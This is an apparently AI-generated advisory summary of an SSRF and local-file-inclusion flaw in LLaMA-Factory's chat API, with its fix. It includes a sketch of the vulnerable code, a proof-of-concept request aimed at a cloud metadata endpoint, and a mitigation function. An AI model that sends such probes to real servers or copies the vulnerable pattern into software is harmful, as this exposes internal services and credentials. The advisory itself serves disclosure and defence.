
LLaMA-Factory, a fine-tuning framework for large language models, disclosed a high-severity vulnerability (CVE-2025-61784) on October 7, 2025. The vulnerability affects versions prior to 0.9.4 and combines Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) in the chat API (GitHub Advisory).
The vulnerability exists in the _process_request function within src/llamafactory/api/chat.py. The function processes multimodal content, including images, videos, and audio provided via URLs. When handling URLs, it performs insufficient validation, issuing direct HTTP GET requests via requests.get(url, stream=True).raw without proper URL sanitization. The vulnerability has received a CVSS v3.1 base score of 7.6 (High) with vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L (GitHub Advisory).
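To make the flaw concrete, the following is a minimal sketch of the vulnerable pattern described above. The helper name and fallthrough behavior are illustrative assumptions, not the project's actual _process_request code:

```python
import requests

def _load_multimodal_input(url: str):
    # Vulnerable pattern: the user-supplied URL is fetched directly.
    # There is no scheme allowlist and no check that the host resolves
    # to a public address, so a value such as an internal service URL
    # is fetched the same way as a legitimate image URL (SSRF).
    if url.startswith(("http://", "https://")):
        return requests.get(url, stream=True).raw
    # Non-HTTP values fall through to a local filesystem read,
    # which is what enables the LFI aspect of the advisory.
    return open(url, "rb")
```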
The vulnerability allows authenticated users to force the server to make arbitrary HTTP requests to internal and external networks, potentially exposing sensitive internal services, enabling reconnaissance of internal networks, or facilitating interaction with third-party services. Additionally, the LFI aspect enables users to read arbitrary files from the server's filesystem (GitHub Advisory).
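As an illustration of how an authenticated user could trigger the SSRF, the request below points the image URL at a cloud metadata endpoint so the server fetches it on the attacker's behalf. The endpoint path, payload shape, and field names follow the OpenAI-style chat API that LLaMA-Factory exposes, but should be treated as assumptions for this sketch:

```python
import requests

# Illustrative SSRF probe against a vulnerable deployment (assumed
# OpenAI-compatible endpoint path and message schema; adjust to the
# actual server configuration and credentials).
payload = {
    "model": "llama3",
    "messages": [{
        "role": "user",
        "content": [
            {"type": "text", "text": "Describe this image."},
            # The server fetches this URL itself, so it can reach
            # internal-only services such as a metadata endpoint.
            {"type": "image_url",
             "image_url": {"url": "http://169.254.169.254/latest/meta-data/"}},
        ],
    }],
}
resp = requests.post(
    "http://target:8000/v1/chat/completions",
    headers={"Authorization": "Bearer <api-key>"},
    json=payload,
    timeout=30,
)
print(resp.status_code)
```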
The vulnerability has been fixed in version 0.9.4 of LLaMA-Factory. Users should upgrade to this version or later to protect against these vulnerabilities. The fix includes proper validation and sanitization of URLs before processing them (GitHub Advisory, GitHub Commit).
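The advisory does not spell out the exact patch, but a typical mitigation validates the URL scheme and resolves the hostname, rejecting private, loopback, and link-local addresses before fetching. The sketch below shows one such approach and is not necessarily what version 0.9.4 implements:

```python
import ipaddress
import socket
from urllib.parse import urlparse

import requests

ALLOWED_SCHEMES = {"http", "https"}

def fetch_remote_media(url: str) -> bytes:
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES or not parsed.hostname:
        raise ValueError(f"unsupported or missing URL scheme: {url!r}")

    # Resolve the hostname and reject private, loopback, and link-local
    # targets to block SSRF against internal services.
    for info in socket.getaddrinfo(parsed.hostname, None):
        addr = ipaddress.ip_address(info[4][0])
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            raise ValueError(f"URL resolves to a disallowed address: {addr}")

    resp = requests.get(url, stream=True, timeout=15)
    resp.raise_for_status()
    return resp.content
```

A complete fix would also need to handle redirects and DNS rebinding, for example by pinning the resolved address when the connection is made.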
Source: This report was generated using AI